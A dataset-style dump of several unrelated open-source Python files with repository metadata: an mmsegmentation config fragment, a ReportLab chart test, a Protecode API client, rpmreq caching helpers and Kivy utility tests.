dict(type='Pad', size=crop_size, pad_val=0, seg_pad_val=255),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_semantic_seg']),
]
test_pipeline = [
# do LoadMultiIageFromFile but it is just to use mmseg apis. (img_ratio is just 1.0)
dict(type='LoadMultiImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=img_scale,
img_ratios=[1.0],
flip=False,
transforms=[
#dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip', prob=0.0),
dict(type='MultiNormalize', **img_norm_cfg),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_root=data_root,
img_dir='range_images/train',
ann_dir='ann_dir/train/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
data_root=data_root,
img_dir='range_images/val',
ann_dir='ann_dir/val',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
data_root=data_root,
img_dir='range_images/test',
ann_dir='ann_dir/test',
pipeline=test_pipeline))
| 35.180328 | 94 | 0.643057 |
7954840fe05abd133363975138b78d15840c83a5 | 5,333 | py | Python | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | 1 | 2020-05-21T23:34:55.000Z | 2020-05-21T23:34:55.000Z | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | #Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(60,50,40,20.83333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(270,50,40,125,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(110,50,40,41.66667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(320,50,40,104.1667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(160,50,40,62.5,rx=0,ry=0,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(370,50,40,83.33333,rx=0,ry=0,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(210,50,40,83.33333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(420,50,40,62.5,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,350,49,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,50,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(200,49,200,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,49,350,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,125,44)
v0.add(String(-10,-10,'Ying',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,275,44)
v0.add(String(-10.83,-10,'Yang',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,81.25,45,81.25,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,112.5,45,112.5,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,143.75,45,143.75,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,81.25)
v0.add(String(-10,-4,'15',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,112.5)
v0.add(String(-10,-4,'30',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,143.75)
v0.add(String(-10,-4,'45',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-10,-4,'60',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 100.622642 | 227 | 0.775173 |
795484531e3aa9da071a5a39cf1ca3f1d78b078c | 14,645 | py | Python | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2020 SAP SE or an SAP affiliate company. All rights reserved. This file is
# licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from urllib.parse import urlencode, quote_plus
import json
import time
from typing import List
import requests
from ci.util import not_empty, not_none, urljoin
from http_requests import check_http_code, mount_default_adapter
from .model import (
AnalysisResult,
CVSSVersion,
ProcessingStatus,
ScanResult,
Triage,
TriageScope,
VersionOverrideScope,
)
class ProtecodeApiRoutes(object):
'''
calculates API routes (URLs) for a subset of the URL endpoints exposed by
"Protecode" (https://protecode.mo.sap.corp)
Not intended to be instantiated by users of this module
'''
def __init__(self, base_url):
self._base_url = not_empty(base_url)
self._api_url = partial(self._url, 'api')
self._rest_url = partial(self._url, 'rest')
def _url(self, *parts):
return urljoin(self._base_url, *parts)
def apps(self, group_id, custom_attribs={}):
url = self._api_url('apps')
if group_id:
url = urljoin(url, str(group_id))
search_query = ' '.join(['meta:' + str(k) + '=' + str(v) for k,v in custom_attribs.items()])
if search_query:
url += '?' + urlencode({'q': search_query})
return url
def login(self):
return self._url('login') + '/'
def pdf_report(self, product_id: int):
return self._url('products', str(product_id), 'pdf-report')
def groups(self):
return self._api_url('groups')
def upload(self, file_name):
return self._api_url('upload', quote_plus(file_name))
def product(self, product_id: int):
return self._api_url('product', str(product_id))
def product_custom_data(self, product_id: int):
return self._api_url('product', str(product_id), 'custom-data')
def rescan(self, product_id):
return self._api_url('product', str(product_id), 'rescan')
def triage(self):
return self._api_url('triage', 'vulnerability/')
def version_override(self):
return self._api_url('versionoverride/')
# ---- "rest" routes (undocumented API)
def scans(self, product_id: int):
return self._rest_url('scans', str(product_id)) + '/'
class ProtecodeApi:
def __init__(self, api_routes, basic_credentials, tls_verify=True):
self._routes = not_none(api_routes)
self._credentials = not_none(basic_credentials)
self._auth = (basic_credentials.username(), basic_credentials.passwd())
self._tls_verify = tls_verify
self._session_id = None
self._session = requests.Session()
mount_default_adapter(
session=self._session,
)
self._csrf_token = None
def set_maximum_concurrent_connections(self, maximum_concurrent_connections: int):
# mount new adapter with new parameters
mount_default_adapter(
session=self._session,
max_pool_size=maximum_concurrent_connections,
)
@check_http_code
def _request(self, method, *args, **kwargs):
if 'headers' in kwargs:
headers = kwargs['headers']
del kwargs['headers']
else:
headers = {}
if 'url' in kwargs:
url = kwargs.get('url')
else:
url = args[0]
if self._session_id:
cookies = {
'sessionid': self._session_id,
'csrftoken': self._csrf_token,
}
headers['X-CSRFTOKEN'] = self._csrf_token
headers['referer'] = url
else:
cookies = None
auth = self._auth
return partial(
method,
verify=self._tls_verify,
auth=auth,
headers=headers,
cookies=cookies,
)(*args, **kwargs)
@check_http_code
def _get(self, *args, **kwargs):
return self._request(self._session.get, *args, **kwargs)
@check_http_code
def _post(self, *args, **kwargs):
return self._request(self._session.post, *args, **kwargs)
@check_http_code
def _put(self, *args, **kwargs):
return self._request(self._session.put, *args, **kwargs)
@check_http_code
def _delete(self, *args, **kwargs):
return self._request(self._session.delete, *args, **kwargs)
@check_http_code
def _patch(self, *args, **kwargs):
return self._request(self._session.patch, *args, **kwargs)
def _metadata_dict(self, custom_attributes):
'''
replaces "invalid" underscore characters (setting metadata fails silently if
those are present). Note: dash characters are implcitly converted to underscore
by protecode.
'''
return {
'META-' + str(k).replace('_', '-'): v
for k,v in custom_attributes.items()
}
def upload(self, application_name, group_id, data, custom_attribs={}) -> AnalysisResult:
url = self._routes.upload(file_name=application_name)
headers = {'Group': str(group_id)}
headers.update(self._metadata_dict(custom_attribs))
result = self._put(
url=url,
headers=headers,
data=data,
)
return AnalysisResult(raw_dict=result.json().get('results'))
def delete_product(self, product_id: int):
url = self._routes.product(product_id=product_id)
self._delete(
url=url,
)
def scan_result(self, product_id: int) -> AnalysisResult:
url = self._routes.product(product_id=product_id)
result = self._get(
url=url,
).json()['results']
return AnalysisResult(raw_dict=result)
def wait_for_scan_result(self, product_id: int, polling_interval_seconds=60):
def scan_finished():
result = self.scan_result(product_id=product_id)
if result.status() in (ProcessingStatus.READY, ProcessingStatus.FAILED):
return result
return False
result = scan_finished()
while not result:
# keep polling until result is ready
time.sleep(polling_interval_seconds)
result = scan_finished()
return result
def list_apps(self, group_id, custom_attribs={}) -> List[AnalysisResult]:
url = self._routes.apps(group_id=group_id, custom_attribs=custom_attribs)
result = self._get(
url=url,
)
# Protecode checks for substring match only.
def full_match(analysis_result_attribs):
if not custom_attribs:
return True
for attrib in custom_attribs:
# attrib is guaranteed to be a key in analysis_result_attribs at this point
if analysis_result_attribs[attrib] != custom_attribs[attrib]:
return False
return True
return [
AnalysisResult(p)
for p in result.json().get('products') if full_match(p.get('custom_data'))
]
def set_metadata(self, product_id: int, custom_attribs: dict):
url = self._routes.product_custom_data(product_id=product_id)
headers = self._metadata_dict(custom_attribs)
result = self._post(
url=url,
headers=headers,
)
return result.json()
def metadata(self, product_id: int):
url = self._routes.product_custom_data(product_id=product_id)
result = self._post(
url=url,
headers={},
)
return result.json().get('custom_data', {})
def add_triage(
self,
triage: Triage,
scope: TriageScope=None,
product_id=None,
group_id=None,
component_version=None,
):
'''
adds an existing Protecode triage to a specified target. The existing triage is usually
retrieved from an already uploaded product (which is represented by `AnalysisResult`).
This method is offered to support "transporting" existing triages.
Note that - depending on the effective target scope, the `product_id`, `group_id` formal
parameters are either required or forbidden.
Note that Protecode will only accept triages for matching (component, vulnerabilities,
version) tuples. In particular, triages for different component versions will be silently
ignored. Explicitly pass `component_version` of target protecode app (/product) to force
Protecode into accepting the given triage.
@param triage: the triage to "copy"
@param scope: if given, overrides the triage's scope
@param product_id: target product_id. required iff scope in FN, FH, R
@param group_id: target group_id. required iff scope is G(ROUP)
@param component_version: overwrite target component version
'''
# if no scope is set, use the one from passed triage
scope = scope if scope else triage.scope()
# depending on the scope, different arguments are required
if scope == TriageScope.ACCOUNT_WIDE:
pass
elif scope in (TriageScope.FILE_NAME, TriageScope.FILE_HASH, TriageScope.RESULT):
not_none(product_id)
elif scope == TriageScope.GROUP:
not_none(group_id)
else:
raise NotImplementedError()
if not component_version:
component_version = triage.component_version()
# "copy" data from existing triage
triage_dict = {
'component': triage.component_name(),
'version': component_version,
'vulns': [triage.vulnerability_id()],
'scope': triage.scope().value,
'reason': triage.reason(),
'description': triage.description(),
}
if product_id:
triage_dict['product_id'] = product_id
if group_id:
triage_dict['group_id'] = group_id
return self.add_triage_raw(triage_dict=triage_dict)
def add_triage_raw(
self, triage_dict: dict
):
url = self._routes.triage()
return self._put(
url=url,
json=triage_dict,
).json()
# --- "rest" routes (undocumented API)
def login(self):
url = self._routes.login()
result = self._post(
url=url,
data={
'username': self._credentials.username(),
'password': self._credentials.passwd(),
},
auth=None,
)
# session-id is returned in first response
if not result.history:
raise RuntimeError('authentication failed:' + str(result.text))
relevant_response = result.history[0]
# work around breaking change in protecode endpoint behaviour
if not relevant_response.cookies.get('sessionid'):
raw_cookie = relevant_response.raw.headers['Set-Cookie']
session_id_key = 'sessionid='
# XXX hack
sid = raw_cookie[raw_cookie.find(session_id_key) + len(session_id_key):]
sid = sid[:sid.find(';')] # let's hope sid never contains a semicolon
self._session_id = sid
del sid
else:
self._session_id = relevant_response.cookies.get('sessionid')
self._csrf_token = relevant_response.cookies.get('csrftoken')
if not self._session_id:
raise RuntimeError('authentication failed: ' + str(relevant_response.text))
def scan_result_short(self, product_id: int):
url = self._routes.scans(product_id)
result = self._get(
url=url,
)
return ScanResult(raw_dict=result.json())
def set_product_name(self, product_id: int, name: str):
url = self._routes.scans(product_id)
self._patch(
url=url,
data=json.dumps({'name': name,}),
headers={'Content-Type': 'application/json'},
)
def rescan(self, product_id: int):
url = self._routes.rescan(product_id)
self._post(
url=url,
)
def set_component_version(
self,
component_name:str,
component_version:str,
objects:[str],
scope:VersionOverrideScope=VersionOverrideScope.APP,
app_id:int = None,
group_id:int = None,
):
url = self._routes.version_override()
override_dict = {
'component': component_name,
'version': component_version,
'objects': objects,
'group_scope': None,
'scope': scope.value,
}
if scope is VersionOverrideScope.APP:
if not app_id:
raise RuntimeError(
'An App ID is required when overriding versions with App scope.'
)
override_dict['app_scope'] = app_id
elif scope is VersionOverrideScope.GROUP:
if not group_id:
raise RuntimeError(
'A Group ID is required when overriding versions with Group scope.'
)
override_dict['group_scope'] = group_id
else:
raise NotImplementedError
return self._put(
url=url,
json=[override_dict],
).json()
def pdf_report(self, product_id: int, cvss_version: CVSSVersion=CVSSVersion.V3):
if not self._csrf_token:
self.login()
url = self._routes.pdf_report(product_id)
if cvss_version is CVSSVersion.V2:
cvss_version_number = 2
elif cvss_version is CVSSVersion.V3:
cvss_version_number = 3
else:
raise NotImplementedError(cvss_version)
response = self._get(
url=url,
params={'cvss_version': cvss_version_number},
)
return response.content
| 32.257709 | 100 | 0.612496 |
7954845c51b9d47639fb69428343a2ab19ea5d6b | 1,750 | py | Python | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | null | null | null | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | null | null | null | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | 1 | 2019-03-10T10:07:04.000Z | 2019-03-10T10:07:04.000Z | import contextlib
import hashlib
import logging
import os
import requests
import time
from rpmreq import exception
log = logging.getLogger(__name__)
@contextlib.contextmanager
def cdir(path):
prev_cwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(prev_cwd)
def ensure_dir(path):
if os.path.exists(path):
if not os.path.isdir(path):
raise exception.NotADirectory(path=path)
else:
os.makedirs(path)
def get_default_cache_base_path():
return os.path.expanduser("~/.rpmreq/cache")
def short_hash(s):
return hashlib.sha1(s.encode()).hexdigest()[:6]
def repo_dir(repo_id, repo_url):
return "%s_%s" % (repo_id, short_hash(repo_url))
def get_file_age(path):
t_mod = os.path.getctime(path)
t_now = time.time()
return t_now - t_mod
def cached_remote_fetch(cache_path, base_url, fn,
cache_ttl=3600, return_data=False):
ensure_dir(cache_path)
url = "%s/%s" % (base_url, fn)
path = os.path.join(cache_path, fn)
fetch = True
if cache_ttl and os.path.exists(path):
# look for cache first
age = get_file_age(path)
if age <= cache_ttl:
# use cached version
fetch = False
if fetch:
r = requests.get(url, allow_redirects=True)
if not r.ok:
raise exception.RemoteFileFetchFailed(code=r.status_code, url=url)
open(path, 'wb').write(r.content)
if return_data:
return r.content
else:
return True
else:
log.info('Using %d s old cached version of %s' % (age, fn))
if return_data:
return open(path, 'rt').read()
else:
return False
| 22.727273 | 78 | 0.614286 |
7954846da328529bd18cc0a32e13f23148cda410 | 7,973 | py | Python | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 9 | 2016-09-03T07:20:01.000Z | 2020-05-21T14:44:48.000Z | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 6 | 2020-01-31T18:04:48.000Z | 2021-06-05T10:53:55.000Z | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 4 | 2016-09-10T15:27:54.000Z | 2020-03-27T22:05:31.000Z | '''
utils tests
===========
'''
import os
import unittest
try:
from unittest.mock import patch # python 3.x
except:
from mock import patch # python 2.x
from kivy.utils import (boundary, escape_markup, format_bytes_to_human,
is_color_transparent, SafeList, get_random_color, get_hex_from_color,
get_color_from_hex, strtotuple, QueryDict, intersection, difference,
interpolate, _get_platform, deprecated, reify)
from kivy import utils
class UtilsTest(unittest.TestCase):
def test_escape_markup(self):
escaped = escape_markup('Sun [1] & Moon [2].')
self.assertEqual(escaped, 'Sun &bl;1&br; & Moon &bl;2&br;.')
def test_format_bytes_to_human(self):
a = format_bytes_to_human(6463)
self.assertEqual(a, '6.31 KB')
b = format_bytes_to_human(6463, precision=4)
self.assertEqual(b, '6.3115 KB')
c = format_bytes_to_human(646368746541)
self.assertEqual(c, '601.98 GB')
def test_boundary(self):
x = boundary(-1000, 0, 100)
self.assertEqual(x, 0)
x = boundary(1000, 0, 100)
self.assertEqual(x, 100)
x = boundary(50, 0, 100)
self.assertEqual(x, 50)
def test_is_color_transparent(self):
c = [1, 1, 1]
self.assertFalse(is_color_transparent(c))
c = [1, 1, 1, 1]
self.assertFalse(is_color_transparent(c))
c = [1, 1, 1, 0]
self.assertTrue(is_color_transparent(c))
@deprecated
def a_deprecated_function(self):
""" This one has doc string. """
pass
def test_deprecated(self):
self.a_deprecated_function()
def test_SafeList_iterate(self): # deprecated
sl = SafeList(['1', 2, 3.])
self.assertTrue(isinstance(sl, list))
it = sl.iterate()
self.assertEqual(next(it), '1')
self.assertEqual(next(it), 2)
self.assertEqual(next(it), 3.)
def test_SafeList_iterate_reverse(self): # deprecated
sl = SafeList(['1', 2, 3.])
self.assertTrue(isinstance(sl, list))
it = sl.iterate(reverse=True)
self.assertEqual(next(it), 3.)
self.assertEqual(next(it), 2)
self.assertEqual(next(it), '1')
def test_SafeList_clear(self):
sl = SafeList(['1', 2, 3.])
self.assertTrue(isinstance(sl, list))
sl.clear()
self.assertEqual(len(sl), 0)
def test_get_random_color_fixed_alpha(self):
actual = get_random_color()
self.assertEqual(len(actual), 4)
self.assertEqual(actual[3], 1.)
actual = get_random_color(alpha=.5)
self.assertEqual(len(actual), 4)
self.assertEqual(actual[3], .5)
def test_get_random_color_random_alpha(self):
actual = get_random_color(alpha='random')
self.assertEqual(len(actual), 4)
def test_get_hex_from_color_noalpha(self):
actual = get_hex_from_color([0, 1, 0])
expected = '#00ff00'
self.assertEqual(actual, expected)
def test_get_hex_from_color_alpha(self):
actual = get_hex_from_color([.25, .77, .90, .5])
expected = '#3fc4e57f'
self.assertEqual(actual, expected)
def test_get_color_from_hex_noalpha(self):
actual = get_color_from_hex('#d1a9c4')
expected = [0.81960784, 0.66274509, 0.76862745, 1.]
for i in range(4):
self.assertAlmostEqual(actual[i], expected[i])
def test_get_color_from_hex_alpha(self):
actual = get_color_from_hex('#00FF7F7F')
expected = [0., 1., 0.49803921, 0.49803921] # can't get .5 from hex
for i in range(4):
self.assertAlmostEqual(actual[i], expected[i])
def test_strtotuple(self):
self.assertRaises(Exception, strtotuple, 'adis!_m%*+-=|')
self.assertRaises(Exception, strtotuple, '((12, 8, 473)')
self.assertRaises(Exception, strtotuple, '[12, 8, 473]]')
self.assertRaises(Exception, strtotuple, '128473')
actual = strtotuple('(12, 8, 473)')
expected = (12, 8, 473)
self.assertEqual(actual, expected)
def test_QueryDict(self):
qd = QueryDict()
self.assertTrue(isinstance(qd, dict))
# __setattr__
qd.toto = 1
self.assertEqual(qd.get('toto'), 1)
# __getattr__
toto = qd.toto
self.assertEqual(toto, 1)
with self.assertRaises(AttributeError):
foo = qd.not_an_attribute
def test_intersection(self):
abcd = ['a', 'b', 'c', 'd']
efgh = ['e', 'f', 'g', 'h']
fedc = ['c', 'd', 'e', 'f'] # cdef is cython keyword O_o)
feed = ['f', 'e', 'e', 'd']
self.assertEqual(intersection(abcd, efgh), [])
self.assertEqual(intersection(abcd, fedc), ['c', 'd'])
self.assertEqual(intersection(feed, feed), feed)
self.assertEqual(intersection([], []), [])
self.assertEqual(intersection(feed, fedc), feed)
self.assertEqual(intersection(fedc, feed), ['d', 'e', 'f'])
self.assertEqual(intersection(feed, efgh), ['f', 'e', 'e'])
def test_difference(self):
abcd = ['a', 'b', 'c', 'd']
efgh = ['e', 'f', 'g', 'h']
fedc = ['c', 'd', 'e', 'f'] # cdef is cython keyword O_o
feed = ['f', 'e', 'e', 'd']
self.assertEqual(difference(abcd, efgh), ['a', 'b', 'c', 'd'])
self.assertEqual(difference(efgh, fedc), ['g', 'h'])
self.assertEqual(difference([], []), [])
self.assertEqual(difference(abcd, abcd), [])
self.assertEqual(difference(fedc, feed), ['c'])
self.assertEqual(difference(feed, abcd), ['f', 'e', 'e'])
self.assertEqual(difference(abcd, feed), ['a', 'b', 'c'])
def test_interpolate_solo(self):
values = [10., 19., 27.1]
a = 0.
for i in range(0, 3):
a = interpolate(a, 100)
self.assertEqual(a, values[i])
def test_interpolate_multi(self):
x = [10., 19., 27.1]
y = [-10., -19., -27.1]
p = 0., 0.
for i in range(0, 3):
p = interpolate(p, [100, -100])
self.assertEqual(p, [x[i], y[i]])
@reify
def fib_100(self):
""" return 100th Fibonacci number
This uses modern view of F sub 1 = 0, F sub 2 = 1. """
# print "calculating..."
a, b = 0, 1
for n in range(2, 101):
a, b = b, a + b
return b
def test_reify(self):
# slow. self.fib_100 is a reify object making the lazy call.
first = self.fib_100
second = self.fib_100 # fast, self.fib_100 is a long.
assert first == second
def test_Platform_android(self):
with patch.dict('os.environ', {'ANDROID_ARGUMENT': ''}):
pf = _get_platform()
self.assertTrue(pf == 'android')
self.assertNotIn('ANDROID_ARGUMENT', os.environ)
def test_Platform_ios(self):
with patch.dict('os.environ', {'KIVY_BUILD': 'ios'}):
pf = _get_platform()
self.assertEqual(pf, 'ios')
self.assertNotIn('KIVY_BUILD', os.environ)
def test_Platform_win32(self):
self._test_platforms('win32', 'win')
def test_Platform_cygwin(self):
self._test_platforms('cygwin', 'win')
def test_Platform_linux2(self):
self._test_platforms('linux2', 'linux')
def test_Platform_darwin(self):
self._test_platforms('darwin', 'macosx')
def test_Platform_freebsd(self):
self._test_platforms('freebsd', 'linux')
def test_Platform_unknown(self):
self._test_platforms('randomdata', 'unknown')
def _test_platforms(self, input, testval):
utils._sys_platform = input
pf = _get_platform()
self.assertTrue(pf == testval)
# with patch('kivy.utils._sys_platform') as m:
# m.__str__.return_value = input
# m.__eq__ = lambda x, y: str(x) == y
# pf = _get_platform()
# self.assertTrue(str(pf) == testval)
| 34.366379 | 77 | 0.587106 |
795484d85416c13a083ff12b932857b3b5a92852 | 1,804 | py | Python | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | from aiogram import types, Dispatcher
from create_bot import dp, bot, BOT_NAME, START_MESSAGE
from keyboards import kb_client
from aiogram.types import ReplyKeyboardRemove
from db import sqlite_db
'''******************** Client part ********************************'''
@dp.message_handler(commands=['start', 'help'])
async def command_start(message: types.Message):
try:
await bot.send_message(message.from_user.id, START_MESSAGE, reply_markup=kb_client)
await message.delete()
except Exception as e:
await message.reply('Общение с ботом через личные сообщения, напишите ему:\nhttps://t.me/{0}'.format(BOT_NAME))
await bot.send_message(BOT_ADMIN_CHATID,
'Error:\n@{0} ({1})\n{2}\n\n{3}'.format(message.from_user.username, message.from_user.id,
message.text, str(e)))
@dp.message_handler(commands=['Режим_работы'])
async def open_command(message: types.Message):
await bot.send_message(message.from_user.id, 'ПН-ВС с 10:00 до 20:00')
@dp.message_handler(commands=['Расположение'])
async def place_command(message: types.Message):
await bot.send_message(message.from_user.id, 'Скоро открытие') #,reply_markup=ReplyKeyboardRemove()
@dp.message_handler(commands=['Меню'])
async def menu_command(message : types.Message):
await bot.send_message(message.from_user.id,'Мы предлагаем:', reply_markup = kb_client)
await sqlite_db.sql_read(message)
def register_handlers_client(dp: Dispatcher):
dp.message_handler(command_start, commands=['start', 'help'])
dp.message_handler(open_command, commands=['Режим_работы'])
dp.message_handler(place_command, commands=['Расположение'])
dp.message_handler(menu_command, commands=['Меню'])
| 42.952381 | 120 | 0.68847 |
7954861510b636e10ce6a09e5f685a906b70f7cc | 362 | py | Python | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | 3 | 2018-11-06T16:29:53.000Z | 2018-11-06T16:43:16.000Z | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | null | null | null | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | null | null | null | import argparse
import json
from xeval.evaluation.utils import run_evaluation
def main():
parser = argparse.ArgumentParser()
parser.add_argument("config", help="Path to config file")
args = parser.parse_args()
with open(args.config) as fin:
config = json.load(fin)
run_evaluation(config)
if __name__ == "__main__":
main()
| 17.238095 | 61 | 0.687845 |
7954869677c535e7b0ae5b3c63c508b9efd937d4 | 6,504 | py | Python | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
